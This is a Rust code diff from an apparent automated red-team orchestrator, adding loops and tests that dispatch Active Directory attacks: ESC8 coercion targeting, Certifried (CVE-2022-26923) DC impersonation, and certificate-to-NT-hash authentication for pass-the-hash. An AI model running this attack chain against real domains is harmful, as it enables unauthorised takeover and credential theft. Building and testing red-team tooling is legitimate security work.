+ fn pick_coerce_targets_orders_dc_then_other_dcs_then_members() {
+ let dcs: HashMap<String, String> = [
+ ("contoso.local".to_string(), "192.168.58.20".to_string()),
+ ("fabrikam.local".to_string(), "192.168.58.30".to_string()),
+ ]
+ .into_iter()
+ .collect();
+ let hosts = vec![windows_host("192.168.58.51", "ws01")];
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+ // Tier 1 (vuln-domain DC) first.
+ assert_eq!(out[0], "192.168.58.20");
+ // Tier 2 (other DC) and Tier 3 (member) both present, no CA.
+ assert!(out.contains(&"192.168.58.30".to_string()));
+ assert!(out.contains(&"192.168.58.51".to_string()));
+ assert!(!out.contains(&"192.168.58.10".to_string()));
+ }
+
+ #[test]
+ fn pick_coerce_targets_dedups_dc_appearing_in_hosts_list() {
+ let dcs: HashMap<String, String> =
+ [("contoso.local".to_string(), "192.168.58.20".to_string())]
+ .into_iter()
+ .collect();
+ let hosts = vec![dc_host("192.168.58.20", "dc01")];
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+ assert_eq!(out, vec!["192.168.58.20".to_string()]);
+ }
+
+ #[test]
+ fn pick_coerce_targets_ca_match_is_case_insensitive() {
+ let dcs: HashMap<String, String> = HashMap::new();
+ let hosts = vec![windows_host("DC01.contoso.local", "dc01")];
+ let out = pick_coerce_targets(Some("dc01.contoso.local"), None, &dcs, &hosts);
+ assert!(
+ out.is_empty(),
+ "CA hostname (case-mismatched) must be excluded"
+ );
+ }
+
+ #[test]
+ fn pick_coerce_targets_empty_when_no_inputs() {
+ let dcs: HashMap<String, String> = HashMap::new();
+ let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]);
+ assert!(out.is_empty());
+ }
}
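
For orientation, a hedged sketch of the payload an ESC8 coercion task carries after the dispatch loop above. All values are invented; the keys mirror the `payload[...] = json!(...)` assignments in `auto_adcs_exploitation`:

```rust
use serde_json::json;

fn main() {
    // Illustrative shape only; every value here is made up.
    let payload = json!({
        "technique": "adcs_esc8",
        "vuln_type": "adcs_esc8",
        "esc_type": "esc8",
        "domain": "contoso.local",
        "impersonate": "administrator",
        "instructions": "(esc_instructions output)",
        "dc_ip": "192.168.58.20",
        "domain_sid": "S-1-5-21-1111-2222-3333",
        "admin_sid": "S-1-5-21-1111-2222-3333-500", // RID 500 appended
        "listener_ip": "192.168.58.99",             // from dispatcher config
        "coerce_target": "192.168.58.20",           // first candidate (legacy key)
        "coerce_targets": ["192.168.58.20", "192.168.58.51"],
        "username": "admin",
        "password": "P@ssw0rd!" // pragma: allowlist secret
    });
    assert_eq!(payload["admin_sid"], "S-1-5-21-1111-2222-3333-500");
}
```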
diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs
index 8b805cea..f2c1342c 100644
--- a/ares-cli/src/orchestrator/automation/bloodhound.rs
+++ b/ares-cli/src/orchestrator/automation/bloodhound.rs
@@ -40,7 +40,7 @@ pub async fn auto_bloodhound(dispatcher: Arc<Dispatcher>, mut shutdown: watch::R
.iter()
.filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d))
.filter_map(|domain| {
- let dc_ip = state.domain_controllers.get(domain).cloned()?;
+ let dc_ip = state.resolve_dc_ip(domain)?;
// Select best credential for this specific domain
let cred = find_domain_credential(
domain,
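
Presumably `resolve_dc_ip` at minimum normalizes the domain key; elsewhere in these automations the `domain_controllers` map is read with `domain.to_lowercase()`. A stand-in sketch under that assumption (the real method lives in the state module and may also handle FQDN fallbacks):

```rust
use std::collections::HashMap;

/// Hypothetical stand-in for StateInner::resolve_dc_ip: lowercase the key
/// so "CONTOSO.LOCAL" and "contoso.local" resolve to the same DC.
fn resolve_dc_ip(dcs: &HashMap<String, String>, domain: &str) -> Option<String> {
    dcs.get(&domain.to_lowercase()).cloned()
}

fn main() {
    let mut dcs = HashMap::new();
    dcs.insert("contoso.local".to_string(), "192.168.58.10".to_string());
    assert_eq!(resolve_dc_ip(&dcs, "CONTOSO.LOCAL").as_deref(), Some("192.168.58.10"));
}
```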
diff --git a/ares-cli/src/orchestrator/automation/certifried.rs b/ares-cli/src/orchestrator/automation/certifried.rs
new file mode 100644
index 00000000..ed15806d
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/certifried.rs
@@ -0,0 +1,485 @@
+//! auto_certifried -- CVE-2022-26923 machine account DNS hostname spoofing.
+//!
+//! Certifried abuses the fact that machine accounts can enroll for certificates
+//! and the DNS hostname in the certificate is derived from the machine account's
+//! dNSHostName attribute. By creating a machine account and setting its
+//! dNSHostName to a DC's hostname, you can obtain a certificate that
+//! authenticates as the DC.
+//!
+//! Prerequisites:
+//! - MachineAccountQuota > 0 (default 10)
+//! - Valid domain credential
+//! - ADCS CA discovered
+//!
+//! Dispatches to "privesc" role with technique "certifried".
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect certifried work items from current state.
+///
+/// Pure logic extracted from `auto_certifried` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_certifried_work(state: &StateInner) -> Vec<CertifriedWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("certifried:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_CERTIFRIED, &dedup_key) {
+ continue;
+ }
+
+ // Find the DC host to get its hostname for spoofing
+ let dc_hostname = state
+ .hosts
+ .iter()
+ .find(|h| h.ip == *dc_ip && h.is_dc)
+ .map(|h| h.hostname.clone())
+ .filter(|h| !h.is_empty());
+
+ // Certifried creates a machine account in the TARGET domain via MAQ.
+ // Cross-forest credentials cannot create machine accounts in a foreign
+ // forest, so require a credential whose domain matches the target.
+ let cred = match state.credentials.iter().find(|c| {
+ c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(CertifriedWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ dc_hostname,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches certifried (CVE-2022-26923) per domain with ADCS.
+/// Interval: 45s.
+pub async fn auto_certifried(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("certifried") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_certifried_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "certifried",
+ "cve": "CVE-2022-26923",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "dc_hostname": item.dc_hostname,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("certifried");
+ match dispatcher
+ .throttled_submit("exploit", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Certifried (CVE-2022-26923) dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_CERTIFRIED, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_CERTIFRIED, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Certifried deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch certifried");
+ }
+ }
+ }
+ }
+}
+
+struct CertifriedWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ dc_hostname: Option<String>,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ // --- collect_certifried_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "certifried:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_CERTIFRIED, "certifried:contoso.local".into());
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dc_hostname_resolved_from_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_hostname, Some("dc01.contoso.local".into()));
+ }
+
+ #[test]
+ fn collect_dc_hostname_none_when_no_host_match() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dc_hostname.is_none());
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_when_only_cross_forest_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ // Certifried needs a target-domain credential to create a machine
+ // account in the target forest; cross-forest creds cannot do this.
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_empty_password_credentials() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "certifried:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("certifried:{}", "contoso.local");
+ assert_eq!(key, "certifried:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("certifried:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "certifried:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_CERTIFRIED, "certifried");
+ }
+
+ #[test]
+ fn dc_hostname_from_hosts() {
+ // Simulates finding a DC hostname from hosts list
+ let hostname = "dc01.contoso.local";
+ let filtered = Some(hostname.to_string()).filter(|h| !h.is_empty());
+ assert_eq!(filtered, Some("dc01.contoso.local".to_string()));
+
+ let empty = Some("".to_string()).filter(|h| !h.is_empty());
+ assert!(empty.is_none());
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = serde_json::json!({
+ "technique": "certifried",
+ "cve": "CVE-2022-26923",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "dc_hostname": "dc01.contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "certifried");
+ assert_eq!(payload["cve"], "CVE-2022-26923");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["dc_hostname"], "dc01.contoso.local");
+ }
+
+ #[test]
+ fn payload_without_dc_hostname() {
+ let payload = serde_json::json!({
+ "technique": "certifried",
+ "cve": "CVE-2022-26923",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "dc_hostname": null,
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert!(payload["dc_hostname"].is_null());
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = CertifriedWork {
+ dedup_key: "certifried:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ dc_hostname: Some("dc01.contoso.local".into()),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dc_hostname, Some("dc01.contoso.local".into()));
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn work_struct_without_hostname() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = CertifriedWork {
+ dedup_key: "certifried:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ dc_hostname: None,
+ credential: cred,
+ };
+ assert!(work.dc_hostname.is_none());
+ }
+}
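
Every automation loop in this PR shares the same at-most-once dispatch contract: filter on `is_processed` while collecting, and only `mark_processed` + `persist_dedup` after `throttled_submit` returns a task id, so deferred (`Ok(None)`) and failed dispatches retry on the next tick. A reduced in-memory sketch of that contract (the real bookkeeping persists through the Redis-backed queue):

```rust
use std::collections::HashSet;

/// Minimal in-memory analogue of the dedup bookkeeping used above.
struct Dedup(HashSet<String>);

impl Dedup {
    fn is_processed(&self, key: &str) -> bool {
        self.0.contains(key)
    }
    fn mark_processed(&mut self, key: String) {
        self.0.insert(key);
    }
}

fn main() {
    let mut dedup = Dedup(HashSet::new());
    let key = "certifried:contoso.local".to_string();
    assert!(!dedup.is_processed(&key)); // first tick: collected and dispatched
    dedup.mark_processed(key.clone()); // only after a successful submit
    assert!(dedup.is_processed(&key)); // later ticks: skipped
}
```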
diff --git a/ares-cli/src/orchestrator/automation/certipy_auth.rs b/ares-cli/src/orchestrator/automation/certipy_auth.rs
new file mode 100644
index 00000000..af498b33
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/certipy_auth.rs
@@ -0,0 +1,749 @@
+//! auto_certipy_auth -- authenticate using obtained certificates.
+//!
+//! After ADCS exploitation (ESC1/ESC4/ESC8) obtains a certificate (.pfx),
+//! this automation dispatches `certipy auth` to convert the certificate
+//! into an NT hash, enabling pass-the-hash for the impersonated user.
+//!
+//! Watches for `certificate_obtained` vulnerability type in discovered_vulnerabilities
+//! which is registered by the ADCS exploitation result processor.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Authenticates with obtained certificates to extract NT hashes.
+/// Interval: 30s.
+pub async fn auto_certipy_auth(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("certipy_auth") {
+ continue;
+ }
+
+ let work: Vec<CertAuthWork> = {
+ let state = dispatcher.state.read().await;
+ collect_cert_auth_work(&state)
+ };
+
+ for item in work {
+ let mut payload = json!({
+ "technique": "certipy_auth",
+ "vuln_id": item.vuln_id,
+ "pfx_path": item.pfx_path,
+ "domain": item.domain,
+ "target_user": item.target_user,
+ });
+
+ if let Some(ref dc) = item.dc_ip {
+ payload["target_ip"] = json!(dc);
+ payload["dc_ip"] = json!(dc);
+ }
+
+ let priority = dispatcher.effective_priority("certipy_auth");
+ match dispatcher
+ .throttled_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ vuln_id = %item.vuln_id,
+ user = %item.target_user,
+ "Certificate authentication dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_CERTIPY_AUTH, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_CERTIPY_AUTH, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(vuln_id = %item.vuln_id, "Certificate auth deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch cert auth");
+ }
+ }
+ }
+ }
+}
+
+/// Pure logic extracted from `auto_certipy_auth` so it can be unit-tested without
+/// needing a `Dispatcher` or async runtime (beyond state construction).
+fn collect_cert_auth_work(state: &crate::orchestrator::state::StateInner) -> Vec<CertAuthWork> {
+ state
+ .discovered_vulnerabilities
+ .values()
+ .filter_map(|vuln| {
+ let vtype = vuln.vuln_type.to_lowercase();
+ if vtype != "certificate_obtained" && vtype != "adcs_certificate" {
+ return None;
+ }
+
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ return None;
+ }
+
+ let dedup_key = format!("cert_auth:{}", vuln.vuln_id);
+ if state.is_processed(DEDUP_CERTIPY_AUTH, &dedup_key) {
+ return None;
+ }
+
+ let pfx_path = vuln
+ .details
+ .get("pfx_path")
+ .or_else(|| vuln.details.get("certificate_path"))
+ .or_else(|| vuln.details.get("cert_file"))
+ .and_then(|v| v.as_str())
+ .map(|s| s.to_string())?;
+
+ let domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let target_user = vuln
+ .details
+ .get("target_user")
+ .or_else(|| vuln.details.get("upn"))
+ .or_else(|| vuln.details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator")
+ .to_string();
+
+ let dc_ip = state
+ .domain_controllers
+ .get(&domain.to_lowercase())
+ .cloned();
+
+ Some(CertAuthWork {
+ vuln_id: vuln.vuln_id.clone(),
+ dedup_key,
+ pfx_path,
+ domain,
+ target_user,
+ dc_ip,
+ })
+ })
+ .collect()
+}
+
+struct CertAuthWork {
+ vuln_id: String,
+ dedup_key: String,
+ pfx_path: String,
+ domain: String,
+ target_user: String,
+ dc_ip: Option<String>,
+}
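
The repeated `.get(a).or_else(|| .get(b))` chains for `pfx_path` and `target_user` are first-match-wins lookups over alternative detail keys. A hypothetical helper making the priority order explicit (not in the codebase; the production code inlines the chains):

```rust
/// First string value found among `keys`, in priority order.
fn first_str<'a>(
    details: &'a serde_json::Map<String, serde_json::Value>,
    keys: &[&str],
) -> Option<&'a str> {
    keys.iter().find_map(|k| details.get(*k).and_then(|v| v.as_str()))
}

fn main() {
    let v = serde_json::json!({ "certificate_path": "/tmp/alt.pfx" });
    let details = v.as_object().unwrap();
    // Same order as collect_cert_auth_work: pfx_path first, then fallbacks.
    let pfx = first_str(details, &["pfx_path", "certificate_path", "cert_file"]);
    assert_eq!(pfx, Some("/tmp/alt.pfx"));
}
```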
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("cert_auth:{}", "vuln-cert-001");
+ assert_eq!(key, "cert_auth:vuln-cert-001");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_CERTIPY_AUTH, "certipy_auth");
+ }
+
+ #[test]
+ fn cert_vuln_types_accepted() {
+ let types = [
+ "certificate_obtained",
+ "adcs_certificate",
+ "CERTIFICATE_OBTAINED",
+ ];
+ for t in &types {
+ let lower = t.to_lowercase();
+ assert!(
+ lower == "certificate_obtained" || lower == "adcs_certificate",
+ "{t} should match"
+ );
+ }
+ }
+
+ #[test]
+ fn non_cert_vuln_types_rejected() {
+ let non_cert = ["esc1", "smb_signing_disabled", "mssql_access"];
+ for t in &non_cert {
+ let lower = t.to_lowercase();
+ assert!(lower != "certificate_obtained" && lower != "adcs_certificate");
+ }
+ }
+
+ #[test]
+ fn pfx_path_fallback_chain() {
+ // Primary key
+ let details = serde_json::json!({"pfx_path": "/tmp/cert.pfx"});
+ let path = details
+ .get("pfx_path")
+ .or_else(|| details.get("certificate_path"))
+ .or_else(|| details.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert_eq!(path, Some("/tmp/cert.pfx"));
+
+ // Fallback to certificate_path
+ let details2 = serde_json::json!({"certificate_path": "/tmp/alt.pfx"});
+ let path2 = details2
+ .get("pfx_path")
+ .or_else(|| details2.get("certificate_path"))
+ .or_else(|| details2.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert_eq!(path2, Some("/tmp/alt.pfx"));
+
+ // Fallback to cert_file
+ let details3 = serde_json::json!({"cert_file": "/tmp/other.pfx"});
+ let path3 = details3
+ .get("pfx_path")
+ .or_else(|| details3.get("certificate_path"))
+ .or_else(|| details3.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert_eq!(path3, Some("/tmp/other.pfx"));
+
+ // No key returns None
+ let details4 = serde_json::json!({});
+ let path4 = details4
+ .get("pfx_path")
+ .or_else(|| details4.get("certificate_path"))
+ .or_else(|| details4.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert!(path4.is_none());
+ }
+
+ #[test]
+ fn target_user_fallback() {
+ let details = serde_json::json!({"target_user": "admin"});
+ let user = details
+ .get("target_user")
+ .or_else(|| details.get("upn"))
+ .or_else(|| details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user, "admin");
+
+ // Falls back to "administrator" when no key present
+ let details2 = serde_json::json!({});
+ let user2 = details2
+ .get("target_user")
+ .or_else(|| details2.get("upn"))
+ .or_else(|| details2.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user2, "administrator");
+ }
+
+ #[test]
+ fn cert_auth_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "certipy_auth",
+ "vuln_id": "cert-001",
+ "pfx_path": "/tmp/cert.pfx",
+ "domain": "contoso.local",
+ "target_user": "administrator",
+ });
+ assert_eq!(payload["technique"], "certipy_auth");
+ assert_eq!(payload["pfx_path"], "/tmp/cert.pfx");
+ assert_eq!(payload["target_user"], "administrator");
+ }
+
+ #[test]
+ fn cert_auth_payload_with_dc() {
+ let mut payload = serde_json::json!({
+ "technique": "certipy_auth",
+ "vuln_id": "cert-001",
+ "pfx_path": "/tmp/cert.pfx",
+ "domain": "contoso.local",
+ "target_user": "administrator",
+ });
+ let dc_ip = Some("192.168.58.10".to_string());
+ if let Some(ref dc) = dc_ip {
+ payload["target_ip"] = serde_json::json!(dc);
+ payload["dc_ip"] = serde_json::json!(dc);
+ }
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["dc_ip"], "192.168.58.10");
+ }
+
+ #[test]
+ fn cert_auth_payload_without_dc() {
+ let payload = serde_json::json!({
+ "technique": "certipy_auth",
+ "vuln_id": "cert-001",
+ "pfx_path": "/tmp/cert.pfx",
+ "domain": "contoso.local",
+ "target_user": "administrator",
+ });
+ assert!(payload.get("target_ip").is_none());
+ assert!(payload.get("dc_ip").is_none());
+ }
+
+ #[test]
+ fn target_user_upn_fallback() {
+ let details = serde_json::json!({"upn": "admin@contoso.local"});
+ let user = details
+ .get("target_user")
+ .or_else(|| details.get("upn"))
+ .or_else(|| details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user, "admin@contoso.local");
+ }
+
+ #[test]
+ fn target_user_account_name_fallback() {
+ let details = serde_json::json!({"account_name": "svc_sql"});
+ let user = details
+ .get("target_user")
+ .or_else(|| details.get("upn"))
+ .or_else(|| details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user, "svc_sql");
+ }
+
+ #[test]
+ fn cert_auth_work_construction() {
+ let work = CertAuthWork {
+ vuln_id: "cert-001".into(),
+ dedup_key: "cert_auth:cert-001".into(),
+ pfx_path: "/tmp/cert.pfx".into(),
+ domain: "contoso.local".into(),
+ target_user: "administrator".into(),
+ dc_ip: Some("192.168.58.10".into()),
+ };
+ assert_eq!(work.vuln_id, "cert-001");
+ assert_eq!(work.dc_ip, Some("192.168.58.10".into()));
+ }
+
+ #[test]
+ fn cert_auth_work_no_dc() {
+ let work = CertAuthWork {
+ vuln_id: "cert-002".into(),
+ dedup_key: "cert_auth:cert-002".into(),
+ pfx_path: "/tmp/cert2.pfx".into(),
+ domain: "fabrikam.local".into(),
+ target_user: "admin".into(),
+ dc_ip: None,
+ };
+ assert!(work.dc_ip.is_none());
+ }
+
+ // -- Tests exercising the extracted `collect_cert_auth_work` function --
+
+ use crate::orchestrator::state::SharedState;
+
+ fn make_vuln(
+ vuln_id: &str,
+ vuln_type: &str,
+ details: std::collections::HashMap<String, serde_json::Value>,
+ ) -> ares_core::models::VulnerabilityInfo {
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: vuln_id.into(),
+ vuln_type: vuln_type.into(),
